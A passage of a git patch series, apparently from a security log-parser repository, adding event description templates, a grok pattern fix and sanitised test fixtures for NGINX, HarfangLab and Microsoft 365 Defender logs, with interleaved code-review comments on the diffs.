test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}", From 29231edac749e000b379d27e328b1d0d2d441fa4 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 4 Oct 2024 11:46:36 +0200 Subject: [PATCH 115/317] Add smart description --- .../microsoft-365-defender/_meta/smart-descriptions.json | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 2ecf8fe38..6673248c1 100644 
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -337,5 +337,12 @@ { "value": "New incident {microsoft.defender.investigation.name}", "conditions": [{ "field": "microsoft.defender.investigation.name" }] + }, + { + "value": "New incident from {source.ip} by {user.full_name}", + "conditions": [ + { "field": "source.ip" }, + { "field": "user.full_name" } + ] } ] From aa85e621b90c6dbf3f42fcacf390396ba7737c8c Mon Sep 17 00:00:00 2001 From: FormindTMA <59610670+Thibault-MAL@users.noreply.github.com> Date: Tue, 8 Oct 2024 11:15:00 +0200 Subject: [PATCH 116/317] Add Network.forward_ip in smart description --- NGINX/nginx/_meta/smart-descriptions.json | 29 +++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/NGINX/nginx/_meta/smart-descriptions.json b/NGINX/nginx/_meta/smart-descriptions.json index 5b75f94da..52597ea0b 100644 --- a/NGINX/nginx/_meta/smart-descriptions.json +++ b/NGINX/nginx/_meta/smart-descriptions.json @@ -1,4 +1,33 @@ [ + { + "value": "{http.request.method} request from {network.forwarded_ip}: {url.original} (status: {http.response.status_code})", + "relationships": [ + { + "source": "network.forwarded_ip", + "target": "url.original", + "type": "requested" + }, + { + "source": "url.original", + "target": "destination.domain", + "type": "hosted on" + } + ], + "conditions": [ + { + "field": "http.request.method" + }, + { + "field": "http.response.status_code" + }, + { + "field": "network.forwarded_ip" + }, + { + "field": "url.original" + } + ] + }, { "value": "{http.request.method} request from {source.ip}: {url.original} (status: {http.response.status_code})", "relationships": [ From a9a8a222a2002dc2318c84bc3887743f046d1434 Mon Sep 17 00:00:00 2001 
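Review bot: In the new `network.forwarded_ip` entry of the NGINX smart descriptions, the second relationship (`url.original` "hosted on" `destination.domain`) names a field that the entry's conditions never require, so an event that has the four required fields but no `destination.domain` produces a relationship with an empty target; whether the engine drops such a relationship or renders it with a blank endpoint is not visible here. Either add `{ "field": "destination.domain" }` to the conditions or drop that relationship from this entry. The same pattern presumably already exists in the sibling `source.ip` entry, whose relationships continue outside the hunk.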
From: FormindTMA <59610670+Thibault-MAL@users.noreply.github.com> Date: Tue, 8 Oct 2024 11:19:56 +0200 Subject: [PATCH 117/317] Add "proxy of" --- NGINX/nginx/_meta/smart-descriptions.json | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/NGINX/nginx/_meta/smart-descriptions.json b/NGINX/nginx/_meta/smart-descriptions.json index 52597ea0b..41d24212e 100644 --- a/NGINX/nginx/_meta/smart-descriptions.json +++ b/NGINX/nginx/_meta/smart-descriptions.json @@ -1,6 +1,6 @@ [ { - "value": "{http.request.method} request from {network.forwarded_ip}: {url.original} (status: {http.response.status_code})", + "value": "{http.request.method} request from {source.ip} proxy of {network.forwarded_ip}: {url.original} (status: {http.response.status_code})", "relationships": [ { "source": "network.forwarded_ip", @@ -23,6 +23,9 @@ { "field": "network.forwarded_ip" }, + { + "field": "network.forwarded_ip" + }, { "field": "url.original" } From abd2db17f628fd13f84b3db28574ccbc48778d2f Mon Sep 17 00:00:00 2001 From: FormindTMA <59610670+Thibault-MAL@users.noreply.github.com> Date: Tue, 8 Oct 2024 11:20:35 +0200 Subject: [PATCH 118/317] Correct source.ip --- NGINX/nginx/_meta/smart-descriptions.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/NGINX/nginx/_meta/smart-descriptions.json b/NGINX/nginx/_meta/smart-descriptions.json index 41d24212e..db5682fa9 100644 --- a/NGINX/nginx/_meta/smart-descriptions.json +++ b/NGINX/nginx/_meta/smart-descriptions.json @@ -21,7 +21,7 @@ "field": "http.response.status_code" }, { - "field": "network.forwarded_ip" + "field": "source.ip" }, { "field": "network.forwarded_ip" From 31d4a9970e8d60beaa3f71dfbd9c0aa5706dabe6 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Tue, 8 Oct 2024 14:55:27 +0200 Subject: [PATCH 119/317] Fix cn field problem --- HarfangLab/harfanglab/ingest/parser.yml | 2 +- .../harfanglab/tests/test_cn_fields_.json | 78 +++++++++++++++++++ 2 files changed, 79 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/test_cn_fields_.json diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 6859ff3dc..e9a5e43fd 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -36,7 +36,7 @@ pipeline: properties: input_field: "{{json_event.message.event_data.MemberName}}" output_field: message - pattern: "(CN=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})" + pattern: "(%{DATA:cn}=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})" - name: agent_info diff --git a/HarfangLab/harfanglab/tests/test_cn_fields_.json b/HarfangLab/harfanglab/tests/test_cn_fields_.json new file mode 100644 index 000000000..e12fc6c8e --- /dev/null +++ b/HarfangLab/harfanglab/tests/test_cn_fields_.json 
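Review bot: `%{DATA:cn}=` in the new grok pattern does more than accept a lower-case `cn=`: DATA matches any run of characters up to the first `=`, so a MemberName that starts with another attribute (for example `OU=` or `DC=`) is now parsed as a first/last name too, and a throwaway `cn` capture is added to the output. If the goal is only case-insensitivity, a literal class is tighter and needs no extra capture: `pattern: "([cC][nN]=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})"` (or an inline `(?i)` flag if the pipeline's regex dialect supports it). The grok block this belongs to starts outside the hunk.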
@@ -0,0 +1,78 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + }, + "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}" + }, + "expected": { + "message": 
"{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}", + "event": { + "code": "4728", + "dataset": "eventlog", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "info" + ] + }, + "@timestamp": "2024-09-26T14:38:37.222000Z", + "action": { + "id": 4728, + "properties": { + "MemberName": "JONE Doe", + "SubjectDomainName": "TEST", + 
"SubjectLogonId": "0x99913777", + "SubjectUserName": "testuser", + "SubjectUserSid": "S-2-2-22-22227555-9999999999-9999999919-2402", + "TargetDomainName": "TEST", + "TargetSid": "S-2-2-22-222222229-9999944444-3976126919-4444", + "TargetUserName": "test_exception" + } + }, + "agent": { + "id": "555555555-9999-9999-9999-3e333333cccc", + "name": "harfanglab" + }, + "harfanglab": { + "groups": [ + "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"TEST_Serveurs_Windows\"}", + "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"TEST_Serveurs_haute_disponibilit\\u00e9\"}" + ] + }, + "host": { + "domain": "TEST", + "hostname": "srv-test01", + "name": "srv-test01", + "os": { + "full": "Windows Server 2022 Standard", + "version": "10.0.20348" + } + }, + "log": { + "hostname": "srv-test01" + }, + "organization": { + "id": "fffffca6b999999" + }, + "related": { + "hosts": [ + "srv-test01" + ], + "user": [ + "testuser" + ] + }, + "user": { + "domain": "TEST", + "name": "testuser", + "roles": "TEST_Serveurs_Windows,TEST_Serveurs_haute_disponibilit\u00e9", + "target": { + "domain": "TEST", + "name": "test_exception" + } + } + } +} \ No newline at end of file From 5b3dcbf12d2983d2c57656ff7c8c1ea380b5ad73 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Tue, 8 Oct 2024 14:57:10 +0200 Subject: [PATCH 120/317] Fix linter --- HarfangLab/harfanglab/tests/test_cn_fields_.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/HarfangLab/harfanglab/tests/test_cn_fields_.json b/HarfangLab/harfanglab/tests/test_cn_fields_.json index e12fc6c8e..875685517 100644 --- a/HarfangLab/harfanglab/tests/test_cn_fields_.json +++ b/HarfangLab/harfanglab/tests/test_cn_fields_.json 
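Review bot: The new HarfangLab fixture declares `"dialect": "Microsoft 365 Defender"` with a Defender `dialect_uuid` under `sekoiaio.intake`, which looks copied from another intake's test and will confuse anyone reading the fixture, even if the parser ignores that block; replace it with the HarfangLab intake values or remove the `sekoiaio` block. The file name `test_cn_fields_.json` also carries a stray trailing underscore, and the file is committed without a trailing newline.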
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" } - }, - "message": 
"{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}" + } }, "expected": { "message": 
"{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"cn=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}", From d3f0cb340b5b742cf06446959c26bfa14fd85cc4 Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia Date: Tue, 8 Oct 2024 13:22:11 +0300 Subject: [PATCH 121/317] Add more smart descriptions --- .../_meta/smart-descriptions.json | 80 ++++++++++++ .../microsoft-365-defender/ingest/parser.yml | 18 ++- .../tests/test_cloud_app3.json | 119 ++++++++++++++++++ .../tests/test_email_attachment_info.json | 57 +++++++++ .../tests/test_email_post_delivery.json | 47 +++++++ .../tests/test_email_url_info_2.json | 43 +++++++ .../tests/test_identity_info.json | 6 +- .../tests/test_identity_info_2.json | 40 ++++++ .../tests/test_identity_logon_2.json | 58 +++++++++ .../tests/test_identity_logon_3.json | 49 ++++++++ .../tests/test_identity_query_2.json | 55 ++++++++ .../tests/test_url_click_events.json | 53 ++++++++ 12 files changed, 622 insertions(+), 3 deletions(-) create mode 100644 Microsoft/microsoft-365-defender/tests/test_cloud_app3.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_attachment_info.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_url_info_2.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_identity_info_2.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_identity_logon_2.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_identity_logon_3.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_identity_query_2.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_url_click_events.json diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 6673248c1..b0c711ee5 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json 
@@ -114,6 +114,24 @@ } ] }, + { + "value": "{process.parent.name} executed on {host.name}", + "conditions": [ + { + "field": "host.name" + }, + { + "field": "process.parent.name" + } + ], + "relationships": [ + { + "source": "host.name", + "target": "process.parent.name", + "type": "was executed on" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on {host.name}", "conditions": [ 
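Review bot: The relationship added with the `{process.parent.name} executed on {host.name}` description points the wrong way: `"source": "host.name"`, `"target": "process.parent.name"`, `"type": "was executed on"` states that the host was executed on the process, whereas the other relationships in this patch series use the source as the subject of the verb (e.g. `network.forwarded_ip` "requested" `url.original`). Swap the endpoints, `"source": "process.parent.name"` and `"target": "host.name"`, so the triple agrees with the description text. The enclosing array continues outside the hunk.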
@@ -340,8 +358,70 @@ }, { "value": "New incident from {source.ip} by {user.full_name}", + "conditions": [{ "field": "source.ip" }, { "field": "user.full_name" }] + }, + { + "value": "{url.original} is in an email", + "conditions": [ + { "field": "event.dataset", "value": "email_url_info" }, + { "field": "url.original" } + ] + }, + { + "value": "{action.type} for {user.name} using {network.protocol}", + "conditions": [ + { "field": "event.dataset", "value": "identity_logon_events" }, + { "field": "action.type" }, + { "field": "user.name" } + ] + }, + { + "value": "Identity query: {action.type} from {source.ip} on {host.name}({destination.ip})", "conditions": [ + { "field": "event.dataset", "value": "identity_query_events" }, + { "field": "action.type" }, { "field": "source.ip" }, + { "field": "host.name" }, + { "field": "destination.ip" } + ] + }, + { + "value": "{event.action} email for {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_post_delivery_events" }, + { "field": "email.to.address" } + ] + }, + { + "value": "Email attachment {file.name} with hash {file.hash.sha256} from {email.from.address} to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_attachment_info" }, + { "field": "file.name" }, + { "field": "file.hash.sha256" }, + { "field": "email.from.address" }, + { "field": "email.to.address" } + ] + }, + { + "value": "{action.type} on {url.original}", + "conditions": [ + { + "field": "event.dataset", + "value": "url_click_events" + }, + { + "field": "action.type" + }, + { + "field": "url.original" + } + ] + }, + { + "value": "Identity info about {user.name}({user.full_name})", + "conditions": [ + { "field": "event.dataset", "value": "identity_info" }, + { "field": "user.name" }, { "field": "user.full_name" } ] } diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index b8bc57fab..d1793d4b2 100644 
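Review bot: Two of the new descriptions interpolate fields that their conditions do not require: `{network.protocol}` in the `identity_logon_events` entry and `{event.action}` in the `email_post_delivery_events` entry. When those fields are absent the description renders with a gap ("... using " / " email for ..."), unless the renderer skips entries with unresolved placeholders, which is not visible here; add `{ "field": "network.protocol" }` and `{ "field": "event.action" }` to the respective conditions, or drop the placeholders. The conditions in this hunk also alternate between one-object-per-line and collapsed `{ "field": ... }` formatting (see the `url_click_events` entry versus its neighbours); picking one style keeps future diffs readable.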
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -92,12 +92,14 @@ pipeline: filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityDirectoryEvents"}}' # These were commented since they are not defined. # Uncomment once the stages are implemented. - # - name: set_identity_info_fields - # filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityInfo"}}' + - name: set_identity_info_fields + filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityInfo"}}' - name: set_identity_logon_events_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityLogonEvents"}}' - name: set_identity_query_events_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-IdentityQueryEvents"}}' + - name: set_url_click_events + filter: '{{json_event.message.get("category") == "AdvancedHunting-UrlClickEvents"}}' stages: set_common_fields: @@ -566,3 +568,15 @@ stages: action.properties.QueryType: "{{json_event.message.properties.QueryType}}" action.properties.QueryTarget: "{{json_event.message.properties.QueryTarget}}" action.properties.Query: "{{json_event.message.properties.Query}}" + set_url_click_events: + actions: + - set: + event.dataset: "url_click_events" + event.category: ["web"] + event.type: ["info"] + set_identity_info_fields: + actions: + - set: + event.dataset: "identity_info" + event.category: ["iam"] + event.type: ["user"] diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json new file mode 100644 index 000000000..d60cc39a1 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json 
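Review bot: The two comment lines `# These were commented since they are not defined.` / `# Uncomment once the stages are implemented.` are left in place in the first hunk although the `set_identity_info_fields` entry below them is now uncommented and the stage is defined in the second hunk, so the comment no longer describes anything; remove both lines. The pipeline list continues outside the hunk.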
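Review bot: The new stage is named `set_url_click_events` while every sibling stage follows the `set_<dataset>_fields` pattern (`set_identity_info_fields`, `set_identity_logon_events_fields`, `set_identity_query_events_fields`); renaming it `set_url_click_events_fields` in both the pipeline entry and the `stages` key keeps the naming uniform. The `stages` mapping continues outside the hunk.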
@@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-03T11:29:06.6566759Z\", \"tenantId\": \"4fbd5d8d-5bb5-40c4-b477-41cf4fc40509\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-CloudAppEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:27:41.2820000Z\", \"properties\": {\"ActionType\": \"MailItemsAccessed\", \"ApplicationId\": 20893, \"AccountDisplayName\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"AccountObjectId\": null, \"AccountId\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"DeviceType\": \"Other\", \"OSPlatform\": \"Unknown\", \"IPAddress\": \"ebce:069e:1ac9:5b57:861b:839d:a2a8:5577\", \"IsAnonymousProxy\": false, \"CountryCode\": \"US\", \"City\": \"redmond\", \"ISP\": \"Microsoft Corporation\", \"UserAgent\": \"Client=REST;Client=RESTSystem;;\", \"IsAdminOperation\": false, \"ActivityObjects\": [{\"Type\": \"Structured object\", \"Role\": \"Parameter\", \"ServiceObjectType\": \"Session ID\"}, {\"Type\": \"Task\", \"Role\": \"Target object\", \"Name\": \"MailItemsAccessed\"}, {\"Type\": \"Property\", \"Role\": \"Parameter\", \"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Type\": \"Property\", \"Role\": \"Parameter\", \"Name\": \"IsThrottled\", \"Value\": \"False\"}, {\"Type\": \"Account\", \"Role\": \"Actor\", \"Name\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"Id\": \"7534549d-2945-469c-9599-c84e749eeeba\", \"ApplicationId\": 11161, \"ApplicationInstance\": 0}, {\"Type\": \"User\", \"Role\": \"Parameter\", \"Name\": \"John DOE\", \"Id\": \"e1704d61-3815-44cc-a4ad-944623127391\", \"ApplicationId\": 11161, \"ApplicationInstance\": 0}], \"AdditionalFields\": {\"IsSatelliteProvider\": false}, \"ActivityType\": \"Run\", \"ObjectName\": \"MailItemsAccessed\", \"ObjectType\": \"Task\", \"ObjectId\": null, \"AppInstanceId\": 0, \"AccountType\": \"Application\", \"IsExternalUser\": false, \"IsImpersonated\": false, \"IPTags\": [\"Microsoft Corporation\"], \"IPCategory\": \"Cloud provider\", \"UserAgentTags\": null, 
